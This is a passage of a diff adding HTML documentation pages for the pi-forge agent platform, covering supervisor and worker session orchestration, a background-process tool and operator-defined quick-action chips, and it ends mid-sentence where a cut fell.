+<td>Drain pending worker events (turn-ends, ask-user-question requests, retry failures, process alerts, deletions). Items return oldest-first and get marked delivered.</td>
+</tr>
+</tbody></table>
+<p>Workers do NOT get these tools — that&#39;s the topology enforcement.</p>
+<h3>Why prompts to workers should read as task briefs</h3>
+<p>The <code>initialPrompt</code> and <code>send_to_worker.message</code> parameters are
+described to the supervisor LLM as <strong>tasks, not conversation</strong>.
+Workers are autonomous agents with no shared transcript or memory
+— &quot;can you help me look at the auth stuff&quot; gives the worker
+nothing to act on. &quot;Audit <code>packages/server/src/auth.ts</code> for the
+JWT verification path; report yes/no on whether expired tokens are
+rejected&quot; is a usable brief.</p>
+<h2>Worker → supervisor wake-up</h2>
+<p>Worker events route into a per-supervisor inbox queue. Five event
+types:</p>
+<table>
+<thead>
+<tr>
+<th>Event</th>
+<th>Source</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>worker.ended</code></td>
+<td>Worker&#39;s AgentSession emitted <code>agent_end</code></td>
+</tr>
+<tr>
+<td><code>worker.ask_user</code></td>
+<td>Worker called <code>ask_user_question</code></td>
+</tr>
+<tr>
+<td><code>worker.auto_retry_failed</code></td>
+<td>Worker&#39;s SDK auto-retry exhausted on a provider error</td>
+</tr>
+<tr>
+<td><code>worker.process_alert</code></td>
+<td>A background process the worker spawned exited (success / failure / external kill)</td>
+</tr>
+<tr>
+<td><code>worker.deleted</code></td>
+<td>Worker&#39;s session was deleted (cold or live)</td>
+</tr>
+</tbody></table>
+<p>When an event lands, the bridge enqueues it AND tries to wake the
+supervisor with a small <code>[orchestration] N pending events…</code> prompt.
+The wake-up only fires when:</p>
+<ol>
+<li>The supervisor session is live (in the in-memory registry), AND</li>
+<li>The supervisor is <strong>idle</strong> (not currently mid-turn), AND</li>
+<li>There isn&#39;t already an in-flight wake-up for the current idle
+window (per-supervisor dedupe flag).</li>
+</ol>
+<p>If the supervisor is mid-turn, the items wait on the queue.
+Recovery fires another wake-up when the supervisor&#39;s own
+<code>agent_end</code> lands — closing the &quot;supervisor finished a turn
+without calling <code>orchestrate_read_inbox</code>&quot; gap.</p>
+<p>The supervisor&#39;s LLM is expected to call <code>orchestrate_read_inbox</code>
+to drain the queue, then <code>orchestrate_read_worker</code> /
+<code>orchestrate_send_to_worker</code> to act on individual workers.</p>
+<h2>Safety</h2>
+<ul>
+<li><strong>Fanout cap.</strong> Each supervisor can have at most
+<code>ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR</code> (default 8) <strong>live</strong>
+workers at a time. Killed / cold workers don&#39;t count. Bounded
+to <code>[1, 100]</code> so a typo in env doesn&#39;t disable the limit.</li>
+<li><strong>Ownership guard.</strong> Every tool that names a <code>workerId</code> verifies
+the worker is linked to <em>this</em> supervisor before acting. A
+confused supervisor LLM can&#39;t reach into another supervisor&#39;s
+workers by id-guessing — the worker store is the source of truth.</li>
+<li><strong>Depth cap.</strong> Workers cannot themselves become supervisors. No
+fork-bombs from a buggy prompt loop.</li>
+<li><strong>Same-project guard.</strong> <code>spawn_worker</code> always spawns into the
+supervisor&#39;s project; the parameter for cross-project doesn&#39;t
+exist in the tool schema.</li>
+<li><strong>Audit trail.</strong> Every orchestration tool call and inbox event
+writes a JSON-line entry to <code>process.stderr</code>
+(<code>orchestration-inbox-enqueued</code>, <code>orchestration-wake-delivered</code>,
+<code>orchestration-wake-failed</code>, etc.). No separate audit UI by
+design — operators tail container logs.</li>
+</ul>
+<h2>Storage</h2>
+<p>Two files in <code>${FORGE_DATA_DIR}</code>:</p>
+<table>
+<thead>
+<tr>
+<th>File</th>
+<th>Purpose</th>
+<th>Mode</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>session-orchestration.json</code></td>
+<td>Supervisor opt-in flags + supervisor↔worker links</td>
+<td><code>0600</code></td>
+</tr>
+<tr>
+<td><code>orchestrator-inbox.json</code></td>
+<td>Per-supervisor pending event queue (FIFO-capped at 200 / supervisor)</td>
+<td><code>0600</code></td>
+</tr>
+</tbody></table>
+<p>Same atomic-write + in-process-lock pattern as
+<a href="./webhooks.md"><code>webhooks.md</code></a>. The inbox file can carry assistant-
+message previews — anything the worker&#39;s agent has been talking
+about — so it gets the secret-grade <code>0600</code> even though it has no
+literal secrets.</p>
+<h2>REST surface</h2>
+<p>The agent-facing tools above are mirrored as REST endpoints the UI
+calls. All are gated by the <code>ORCHESTRATION_ENABLED</code> flag and the
+MINIMAL_UI hard gate — they return <code>403 orchestration_disabled</code> or
+<code>403 minimal_ui_disabled</code> when off.</p>
+<table>
+<thead>
+<tr>
+<th>Method + path</th>
+<th>Purpose</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>GET /api/v1/orchestration/config</code></td>
+<td>Instance flag + caps. Used by the UI to decide whether to render the toggle.</td>
+</tr>
+<tr>
+<td><code>GET /api/v1/orchestration/sessions/:id</code></td>
+<td>Role of a session (<code>supervisor</code> / <code>worker</code> / <code>standalone</code>) + linkage.</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/orchestration/sessions/:id/enable</code></td>
+<td>Make the session a supervisor; rebuild the live AgentSession in place.</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/orchestration/sessions/:id/disable</code></td>
+<td>Drop supervisor mode; detach workers; clear inbox; rebuild.</td>
+</tr>
+<tr>
+<td><code>GET /api/v1/orchestration/sessions/:id/workers</code></td>
+<td>Live worker list for a supervisor (drives the Workers panel).</td>
+</tr>
+<tr>
+<td><code>GET /api/v1/orchestration/sessions/:id/inbox</code></td>
+<td>Full inbox history (delivered + pending), newest first.</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/orchestration/sessions/:id/inbox/clear</code></td>
+<td>Wipe inbox.</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/orchestration/sessions/:id/workers/:wid/detach</code></td>
+<td>UI detach.</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/orchestration/sessions/:id/workers/:wid/kill</code></td>
+<td>UI kill (transcript stays on disk; use <code>DELETE /sessions/:id</code> to remove it).</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/orchestration/sessions/:id/workers/:wid/resume</code></td>
+<td>Force-resume a cold worker into the registry.</td>
+</tr>
+</tbody></table>
+<p>Full schemas: open <code>/api/docs</code> in your deploy.</p>
+<h2>UI surface</h2>
+<ul>
+<li><strong>Toolbar <code>Orch</code> button</strong> — only renders when the instance flag
+is on. Toggles the per-session Orchestration panel.</li>
+<li><strong>Orchestration panel</strong> (collapsible, mounted between the chat
+toolbar and the message list):<ul>
+<li><strong>Standalone</strong> session → &quot;Enable supervisor mode&quot; button.</li>
+<li><strong>Supervisor</strong> session → workers list with state pills
+(streaming / idle / cold), per-worker Resume / Detach / Kill
+buttons, pending-inbox badge, expandable inbox history with
+type-coded labels, &quot;Disable supervisor mode&quot; button, &quot;Clear
+inbox&quot; button.</li>
+<li><strong>Worker</strong> session → back-link to the supervisor (click to
+jump), handoff badge if spawned from a <code>contextSummary</code>.</li>
+</ul>
+</li>
+<li>The panel polls <code>/orchestration/sessions/:id/workers</code> and
+<code>/inbox</code> every 4s while open so the live state stays fresh.</li>
+</ul>
+<h2>Troubleshooting</h2>
+<p><strong><code>Orch</code> button isn&#39;t visible.</strong> Either <code>ORCHESTRATION_ENABLED</code>
+isn&#39;t set in the environment, or <code>MINIMAL_UI=true</code> is overriding
+it. Check <code>GET /api/v1/orchestration/config</code> — <code>disabledReason</code>
+tells you which gate is closed.</p>
+<p><strong>Enabling supervisor mode succeeded but <code>orchestrate_*</code> tools
+aren&#39;t visible to the agent.</strong> The route rebuilds the live
+AgentSession in place, but only for sessions that are currently
+live in the registry. A cold session needs to be opened (SSE
+attach) first; opening it triggers <code>resumeSession</code>, which picks
+up the supervisor flag and includes the tools in <code>customTools</code>.</p>
+<p><strong>Supervisor doesn&#39;t react to worker activity.</strong> Two failure
+modes to distinguish:</p>
+<ol>
+<li>The supervisor LLM isn&#39;t calling <code>orchestrate_read_inbox</code>. The
+inbox file is being written to; check
+<code>${FORGE_DATA_DIR}/orchestrator-inbox.json</code> and look for
+<code>delivered: false</code> items. The wake-up prompt may have been
+ignored — strengthen the supervisor&#39;s system prompt or
+instruct it explicitly.</li>
+<li>The wake-up isn&#39;t firing. Look for
+<code>orchestration-wake-delivered</code> / <code>orchestration-wake-failed</code>
+lines in stderr. A &quot;failed&quot; line usually means the supervisor
+session has no model configured — supervisors need provider
+credentials just like any other session.</li>
+</ol>
+<p><strong><code>fanout_limit_exceeded</code> errors.</strong> Spawn was rejected because the
+supervisor already has the max live workers. Either kill some
+(<code>orchestrate_kill_worker</code>), detach the ones you no longer care
+about (<code>orchestrate_detach_worker</code>), or raise
+<code>ORCHESTRATION_MAX_WORKERS_PER_SUPERVISOR</code>.</p>
+<p><strong><code>depth_limit_exceeded</code>.</strong> A worker is trying to become a
+supervisor. v1 disallows this by design — depth is capped at 1.</p>
+<h2>See also</h2>
+<ul>
+<li><a href="./webhooks.md"><code>webhooks.md</code></a> — the other &quot;tell something about
+agent events&quot; surface. Webhooks fan out OVER HTTPS to external
+systems; orchestration fans IN to a supervisor session.</li>
+<li><a href="./processes.md"><code>processes.md</code></a> — workers can spawn background
+processes the same way standalone sessions can; process alerts
+fed back into the supervisor&#39;s inbox as <code>worker.process_alert</code>.</li>
+<li><a href="./ask-user-question.md"><code>ask-user-question.md</code></a> — when a worker
+calls this tool, the supervisor sees a <code>worker.ask_user</code> inbox
+item and can answer via <code>orchestrate_send_to_worker</code>.</li>
+<li><a href="../CLAUDE.md"><code>CLAUDE.md</code></a> — file-by-file map of the
+<code>packages/server/src/orchestration/</code> module.</li>
+</ul>
+
+    </main>
+  </div>
+
+  <button class="sidebar-toggle" id="sidebarToggle" aria-label="Toggle sidebar">&#9776;</button>
+
+  <script>
+    document.getElementById('mobileToggle').addEventListener('click', () => {
+      document.getElementById('navLinks').classList.toggle('open');
+    });
+    document.getElementById('sidebarToggle').addEventListener('click', () => {
+      document.getElementById('docsSidebar').classList.toggle('open');
+    });
+  </script>
+</body>
+</html>

--- a/docs/site/docs/processes.html
+++ b/docs/site/docs/processes.html
@@ -1,0 +1,217 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Background Processes — pi-forge</title>
+  <meta name="description" content="The process tool — long-running processes the agent manages across turns.">
+  <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'><rect x='1' y='1' width='30' height='30' rx='7' fill='%230d0d10'/><path d='M12 13 H20 M14 13 V21 M18 13 V21' stroke='%23e6e7eb' stroke-width='1.6' stroke-linecap='round' fill='none'/></svg>">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="../style.css">
+</head>
+<body>
+  <header class="site-header">
+    <div class="header-inner">
+      <a href="../index.html" class="logo">
+        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" fill="none" aria-hidden="true">
+  <rect x="1" y="1" width="30" height="30" rx="7" fill="#0d0d10"/>
+  <path d="M9 11 L6 16 L9 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M23 11 L26 16 L23 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M12 13 H20 M14 13 V21 M18 13 V21" stroke="#e6e7eb" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+</svg>
+        pi-forge
+      </a>
+      <nav class="nav-links" id="navLinks">
+        <a href="../index.html#features">Features</a>
+        <a href="../index.html#quickstart">Quick Start</a>
+        <a href="architecture.html">Docs</a>
+        <a href="https://github.com/Devin-Marks/pi-forge" class="nav-cta">GitHub</a>
+      </nav>
+      <button class="mobile-toggle" id="mobileToggle" aria-label="Toggle menu">&#9776;</button>
+    </div>
+  </header>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="docsSidebar">
+      <div class="sidebar-section">
+        <h4>Documentation</h4>
+        <a href="architecture.html">Architecture</a>
+        <a href="configuration.html">Configuration</a>
+        <a href="containers.html">Containers</a>
+        <a href="deployment.html">Deployment</a>
+        <a href="mobile.html">Mobile</a>
+        <a href="api.html">API Examples</a>
+        <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html" class="active">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
+        <a href="sse-events.html">SSE Events</a>
+      </div>
+      <div class="sidebar-section">
+        <h4>Project</h4>
+        <a href="https://github.com/Devin-Marks/pi-forge">GitHub</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/CHANGELOG.md">Changelog</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/SECURITY.md">Security</a>
+      </div>
+    </aside>
+
+    <main class="docs-main">
+      <h1>Background Processes</h1>
+      <p class="docs-subtitle">The process tool — long-running processes the agent manages across turns.</p>
+<p>pi-forge ships a browser-native implementation of the <code>process</code>
+tool: a session-scoped manager for background processes the agent
+spawns (dev servers, test watchers, builds, log tails). Separate
+from <code>bash</code> — that tool is for one-shot synchronous commands; the
+<code>process</code> tool is for things that should keep running while the
+conversation continues.</p>
+<h2>Actions</h2>
+<table>
+<thead>
+<tr>
+<th>Action</th>
+<th>Required</th>
+<th>Notes</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>start</code></td>
+<td><code>name</code>, <code>command</code></td>
+<td>Spawns under <code>/bin/sh -c</code> with a scrubbed env (same posture as the integrated terminal — no pi-forge or provider secrets leak). Returns the process id.</td>
+</tr>
+<tr>
+<td><code>list</code></td>
+<td>—</td>
+<td>Returns every process for the session, newest-first.</td>
+</tr>
+<tr>
+<td><code>output</code></td>
+<td><code>id</code></td>
+<td>Recent in-memory tail of stdout/stderr (~200 lines). For the full history, use <code>logs</code> to get the file paths and read them.</td>
+</tr>
+<tr>
+<td><code>logs</code></td>
+<td><code>id</code></td>
+<td>Absolute paths to the on-disk log files. Agents can read them with the <code>read</code> tool; the UI streams them via <code>GET /logs/file</code>.</td>
+</tr>
+<tr>
+<td><code>kill</code></td>
+<td><code>id</code></td>
+<td>SIGTERM → 5 s grace → SIGKILL. Returns once the signal is sent; the lifecycle event fans out async on actual exit.</td>
+</tr>
+<tr>
+<td><code>clear</code></td>
+<td>—</td>
+<td>Drop FINISHED processes from the list. Live ones stay.</td>
+</tr>
+<tr>
+<td><code>write</code></td>
+<td><code>id</code>, <code>input</code>, optional <code>end</code></td>
+<td>Pipe data to stdin. <code>end: true</code> closes the stream (for programs reading until EOF).</td>
+</tr>
+</tbody></table>
+<h2>Notifications</h2>
+<p>Per-<code>start</code> flags control whether the agent gets a turn to react
+on lifecycle events:</p>
+<ul>
+<li><code>alertOnSuccess</code> (default: <code>false</code>) — non-zero exit gates this off</li>
+<li><code>alertOnFailure</code> (default: <code>true</code>) — fires on crash / non-zero exit</li>
+<li><code>alertOnKill</code> (default: <code>false</code>) — fires only on external signal; killing via the tool never triggers a turn</li>
+</ul>
+<p><code>logWatches</code> adds runtime regex matchers per process. On match, the
+manager emits a watch event the UI surfaces as an alert badge.
+<code>stream: &quot;stdout&quot; | &quot;stderr&quot; | &quot;both&quot;</code>; <code>repeat: false</code> is the
+default (single-fire) — set <code>true</code> for repeat alerts.</p>
+<h2>UI</h2>
+<table>
+<thead>
+<tr>
+<th>Surface</th>
+<th>Behavior</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><strong>Right-pane &quot;Processes&quot; tab</strong></td>
+<td>Always present. Running on top, finished below. Per-row: status icon + name + truncated command + duration. Click to expand → stdout/stderr tails + Kill button + links to the full log files.</td>
+</tr>
+<tr>
+<td><strong>Chat-input badge</strong></td>
+<td>Small <code>Activity</code> icon in the top-right of the chat composer, visible only when the active session has ≥1 running process. Click → auto-opens the right pane (if collapsed) and switches the tab to Processes.</td>
+</tr>
+<tr>
+<td><strong>Tab badge</strong></td>
+<td>Numeric count of running processes on the Processes tab itself.</td>
+</tr>
+<tr>
+<td><strong>Watch alerts</strong></td>
+<td>A small amber header in the panel lists the latest match events. Click the rotate icon to dismiss.</td>
+</tr>
+</tbody></table>
+<h2>Persistence</h2>
+<p><strong>In-memory only.</strong> A server restart drops every process record;
+the OS may leak the actual children if pi-forge crashes mid-
+lifecycle (same posture as the upstream plugin). The panel footer
+says so explicitly: <em>&quot;In-memory only — processes don&#39;t survive a
+server restart.&quot;</em></p>
+<p>Log files DO persist on disk at
+<code>${FORGE_DATA_DIR}/processes/&lt;sessionId&gt;/&lt;processId&gt;/{stdout,stderr}.log</code>
+(rotated at 10 MB → <code>.1</code>), and are cleaned up when the session is
+disposed.</p>
+<h2>Session lifecycle</h2>
+<p>When a session is disposed (<code>disposeSession</code> in
+<code>session-registry.ts</code>):</p>
+<ol>
+<li>Every live process for the session gets SIGTERM</li>
+<li>Brief grace window</li>
+<li>Any survivors get SIGKILL</li>
+<li>The session&#39;s log directory is <code>rm -rf</code>&#39;d</li>
+<li>The manager&#39;s in-memory map drops the session entry</li>
+</ol>
+<h2>MINIMAL_UI</h2>
+<p><code>process.start</code> returns an error envelope under <code>MINIMAL_UI=1</code> —
+spawning new processes is a trust surface peer to bash. Listing /
+killing / clearing existing processes remains usable so an
+operator who toggles <code>MINIMAL_UI</code> on can still see and stop
+whatever was already running.</p>
+<h2>Disabling the tool</h2>
+<p>The tool appears under <strong>Settings → Tools → Built-in tools</strong>.
+Toggle it off there to filter <code>process</code> out of every new session&#39;s
+tool allowlist. Live sessions keep the tool list they were created
+with.</p>
+<h2>Relationship to <code>@aliou/pi-processes</code></h2>
+<p>The wire contract — tool name (<code>process</code>), action enum, per-
+process <code>ProcessInfo</code> shape, status state machine (<code>running | terminating | terminate_timeout | exited | killed</code>), <code>LogWatch</code>
+shape with <code>pattern/stream/repeat</code>, and <code>ProcessesDetails</code>
+response envelope — is <strong>contract-compatible with
+<a href="https://github.com/aliou/pi-processes" target="_blank" rel="noopener noreferrer"><code>@aliou/pi-processes</code></a></strong>
+(MIT). An agent prompt authored against the plugin works against
+this implementation unchanged.</p>
+<p>Implementation is independent. The reducer, lifecycle, signal
+handling, log capture, regex watches, SSE bridge, REST routes,
+and React UI are all pi-forge&#39;s own. The prompt snippet + tool
+description + guidelines are <strong>ported verbatim with attribution</strong>
+in <code>packages/server/src/processes/prompt-strings.ts</code> — wording
+like &quot;avoid shell background patterns such as <code>&amp;</code>, <code>nohup</code>,
+<code>disown</code>, or <code>setsid</code> when the process tool fits&quot; steers the
+model toward the right primitive; rederiving it risks worse
+tool-invocation patterns.</p>
+
+    </main>
+  </div>
+
+  <button class="sidebar-toggle" id="sidebarToggle" aria-label="Toggle sidebar">&#9776;</button>
+
+  <script>
+    document.getElementById('mobileToggle').addEventListener('click', () => {
+      document.getElementById('navLinks').classList.toggle('open');
+    });
+    document.getElementById('sidebarToggle').addEventListener('click', () => {
+      document.getElementById('docsSidebar').classList.toggle('open');
+    });
+  </script>
+</body>
+</html>

--- a/docs/site/docs/quick-actions.html
+++ b/docs/site/docs/quick-actions.html
@@ -1,0 +1,294 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Quick Actions — pi-forge</title>
+  <meta name="description" content="Operator-defined chat-toolbar chips for shell commands and prompt templates.">
+  <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'><rect x='1' y='1' width='30' height='30' rx='7' fill='%230d0d10'/><path d='M12 13 H20 M14 13 V21 M18 13 V21' stroke='%23e6e7eb' stroke-width='1.6' stroke-linecap='round' fill='none'/></svg>">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="../style.css">
+</head>
+<body>
+  <header class="site-header">
+    <div class="header-inner">
+      <a href="../index.html" class="logo">
+        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" fill="none" aria-hidden="true">
+  <rect x="1" y="1" width="30" height="30" rx="7" fill="#0d0d10"/>
+  <path d="M9 11 L6 16 L9 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M23 11 L26 16 L23 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M12 13 H20 M14 13 V21 M18 13 V21" stroke="#e6e7eb" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+</svg>
+        pi-forge
+      </a>
+      <nav class="nav-links" id="navLinks">
+        <a href="../index.html#features">Features</a>
+        <a href="../index.html#quickstart">Quick Start</a>
+        <a href="architecture.html">Docs</a>
+        <a href="https://github.com/Devin-Marks/pi-forge" class="nav-cta">GitHub</a>
+      </nav>
+      <button class="mobile-toggle" id="mobileToggle" aria-label="Toggle menu">&#9776;</button>
+    </div>
+  </header>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="docsSidebar">
+      <div class="sidebar-section">
+        <h4>Documentation</h4>
+        <a href="architecture.html">Architecture</a>
+        <a href="configuration.html">Configuration</a>
+        <a href="containers.html">Containers</a>
+        <a href="deployment.html">Deployment</a>
+        <a href="mobile.html">Mobile</a>
+        <a href="api.html">API Examples</a>
+        <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html" class="active">Quick Actions</a>
+        <a href="sse-events.html">SSE Events</a>
+      </div>
+      <div class="sidebar-section">
+        <h4>Project</h4>
+        <a href="https://github.com/Devin-Marks/pi-forge">GitHub</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/CHANGELOG.md">Changelog</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/SECURITY.md">Security</a>
+      </div>
+    </aside>
+
+    <main class="docs-main">
+      <h1>Quick Actions</h1>
+      <p class="docs-subtitle">Operator-defined chat-toolbar chips for shell commands and prompt templates.</p>
+<p>Operator-defined chips on the chat-view toolbar that either run a
+shell command in the active project&#39;s cwd OR insert/send a
+templated prompt to the active session. Configure from
+<strong>Settings → Quick Actions</strong>.</p>
+<h2>Two kinds</h2>
+<p>Each action is one or the other — never both:</p>
+<table>
+<thead>
+<tr>
+<th>Kind</th>
+<th>Discriminator</th>
+<th>What happens when clicked</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><strong>Command</strong></td>
+<td><code>command</code> is set</td>
+<td>pi-forge runs the command in the active project&#39;s working directory and renders the result as a <code>QuickActionRunCard</code> in the chat.</td>
+</tr>
+<tr>
+<td><strong>Prompt</strong></td>
+<td><code>text</code> is set</td>
+<td>The templated prompt either <strong>sends</strong> to the active session (<code>mode: &quot;send&quot;</code>) or <strong>inserts</strong> into the composer (<code>mode: &quot;insert&quot;</code>) for you to edit before sending.</td>
+</tr>
+</tbody></table>
+<p>Why the split: commands are about &quot;I want to see the output of
+<code>npm run build</code> right now&quot; — fast, one-shot, no LLM round trip.
+Prompts are about &quot;I want to say the same thing to the agent
+every time without retyping it&quot; — <code>Refactor this for clarity</code>,
+<code>Add tests for this module</code>, etc.</p>
+<h2>Storage</h2>
+<p><code>${FORGE_DATA_DIR}/quick-actions.json</code> (mode <code>0600</code>). Atomic-write</p>
+<ul>
+<li>in-process lock pattern, same as the other forge-owned
+JSON files. Single flat array — chips are the operator&#39;s
+personal toolbox, global by design rather than per-project.</li>
+</ul>
+<pre><code class="language-json">[
+  {
+    &quot;id&quot;: &quot;build&quot;,
+    &quot;name&quot;: &quot;Build&quot;,
+    &quot;command&quot;: &quot;npm run build&quot;,
+    &quot;timeoutMs&quot;: 60000,
+    &quot;enabled&quot;: true
+  },
+  {
+    &quot;id&quot;: &quot;refactor&quot;,
+    &quot;name&quot;: &quot;Refactor for clarity&quot;,
+    &quot;text&quot;: &quot;Refactor the file I&#39;m currently looking at for clarity. Keep behavior identical.&quot;,
+    &quot;mode&quot;: &quot;insert&quot;,
+    &quot;enabled&quot;: true
+  }
+]
+</code></pre>
+<h2>Field reference</h2>
+<table>
+<thead>
+<tr>
+<th>Field</th>
+<th>Required</th>
+<th>Notes</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>id</code></td>
+<td>yes</td>
+<td>UUID generated at create time; stable across renames.</td>
+</tr>
+<tr>
+<td><code>name</code></td>
+<td>yes</td>
+<td>Label shown on the chip.</td>
+</tr>
+<tr>
+<td><code>enabled</code></td>
+<td>optional</td>
+<td>Defaults to <code>true</code>. Disabled actions stay in the registry but don&#39;t render the chip.</td>
+</tr>
+<tr>
+<td><code>command</code></td>
+<td>one-of</td>
+<td>Shell command string. Required when this is a command action. Capped at 8 KB.</td>
+</tr>
+<tr>
+<td><code>timeoutMs</code></td>
+<td>optional (command-only)</td>
+<td>Per-run timeout. Default 30 s, ceiling 5 min.</td>
+</tr>
+<tr>
+<td><code>text</code></td>
+<td>one-of</td>
+<td>Prompt template. Required when this is a prompt action. Capped at 32 KB.</td>
+</tr>
+<tr>
+<td><code>mode</code></td>
+<td>optional (prompt-only)</td>
+<td><code>send</code> (default for prompts created via UI) or <code>insert</code>.</td>
+</tr>
+</tbody></table>
+<p>The store rejects entries with <strong>both</strong> <code>command</code> and <code>text</code>, or
+<strong>neither</strong> — that&#39;s the discriminator integrity check.</p>
+<h2>Command execution</h2>
+<ul>
+<li>Spawned via <code>child_process.spawn</code> with <code>shell: false</code> and
+<code>[&quot;bash&quot;, &quot;-lc&quot;, command]</code> as argv, so shell built-ins (pipes,
+redirects, <code>&amp;&amp;</code>) work.</li>
+<li><strong>cwd is the active project&#39;s path.</strong> The chip is project-scoped
+at runtime even though chip definitions are global.</li>
+<li><strong>Env is scrubbed</strong> through the same allowlist as the integrated
+terminal (<code>pty-manager.ts#scrubbedEnv</code>). Provider API keys from
+the pi-forge process env do <strong>not</strong> leak into chip-spawned
+commands by default. Add specific passthrough vars via
+<code>TERMINAL_PASSTHROUGH_ENV</code> (e.g.,
+<code>TERMINAL_PASSTHROUGH_ENV=KUBECONFIG,EDITOR</code>).</li>
+<li><strong>Output is captured both streams</strong>, truncated at 1 MB per
+stream (re-run in the integrated terminal if you need the full
+output). Truncation surfaces as <code>truncated: true</code> on the result.</li>
+<li><strong>Disabled under <code>MINIMAL_UI=true</code>.</strong> Command runs return 403
+<code>minimal_ui_disabled</code>. The Quick Actions Settings tab itself is
+hidden; chips don&#39;t render in the chat toolbar.</li>
+</ul>
+<h2>Prompt actions</h2>
+<ul>
+<li>The template text is delivered as a user-role message to the
+active session — exactly as if the user had typed it.</li>
+<li><code>mode: &quot;send&quot;</code> posts straight to
+<code>POST /api/v1/sessions/:id/prompt</code>.</li>
+<li><code>mode: &quot;insert&quot;</code> writes the text into the chat composer; the
+user can edit before pressing send.</li>
+<li>Templates are static for v1 — no variable interpolation. If you
+need per-call dynamism, use <code>mode: &quot;insert&quot;</code> and edit at run
+time.</li>
+<li><strong>Available under <code>MINIMAL_UI=true</code></strong>: prompts don&#39;t open a
+shell, they just deliver text to the agent. Same gate as the
+rest of the chat surface.</li>
+</ul>
+<h2>REST surface</h2>
+<table>
+<thead>
+<tr>
+<th>Method + path</th>
+<th>Purpose</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>GET /api/v1/quick-actions</code></td>
+<td>List configured actions (any project context).</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/quick-actions</code></td>
+<td>Create. Validates the one-of discriminator + byte caps.</td>
+</tr>
+<tr>
+<td><code>PUT /api/v1/quick-actions/:id</code></td>
+<td>Update. Switching kind (command → prompt or vice-versa) drops the now-unused fields.</td>
+</tr>
+<tr>
+<td><code>DELETE /api/v1/quick-actions/:id</code></td>
+<td>Remove.</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/quick-actions/:id/run?projectId=…</code></td>
+<td>Run a command action against the given project&#39;s cwd. Returns <code>{ success, exitCode, stdout, stderr, durationMs, timedOut, truncated }</code>. Returns 403 <code>minimal_ui_disabled</code> if MINIMAL_UI is on.</td>
+</tr>
+</tbody></table>
+<p>Prompt-mode actions don&#39;t have a server-side <code>run</code> route — the
+client just posts to the session&#39;s <code>/prompt</code> endpoint. Full
+schemas at <code>/api/docs</code>.</p>
+<h2>UI surface</h2>
+<ul>
+<li><strong>Settings → Quick Actions.</strong> Hidden under MINIMAL_UI.
+Add/edit/delete chips, reorder is by creation order (not yet
+draggable in v1).</li>
+<li><strong>Chat toolbar <code>QuickActionsMenu</code>.</strong> Renders the enabled chips
+for the active project. Click → run (command) or send/insert
+(prompt). Hidden under MINIMAL_UI.</li>
+<li><strong><code>QuickActionRunCard</code>.</strong> Inline card in the chat surface that
+renders a completed command run — stdout, stderr, exit code,
+duration, truncation indicator. Lives in the chat transcript so
+the agent can see what ran (and reference it in subsequent
+turns).</li>
+</ul>
+<h2>Troubleshooting</h2>
+<p><strong>Command returns immediately with <code>exitCode: -1</code> and
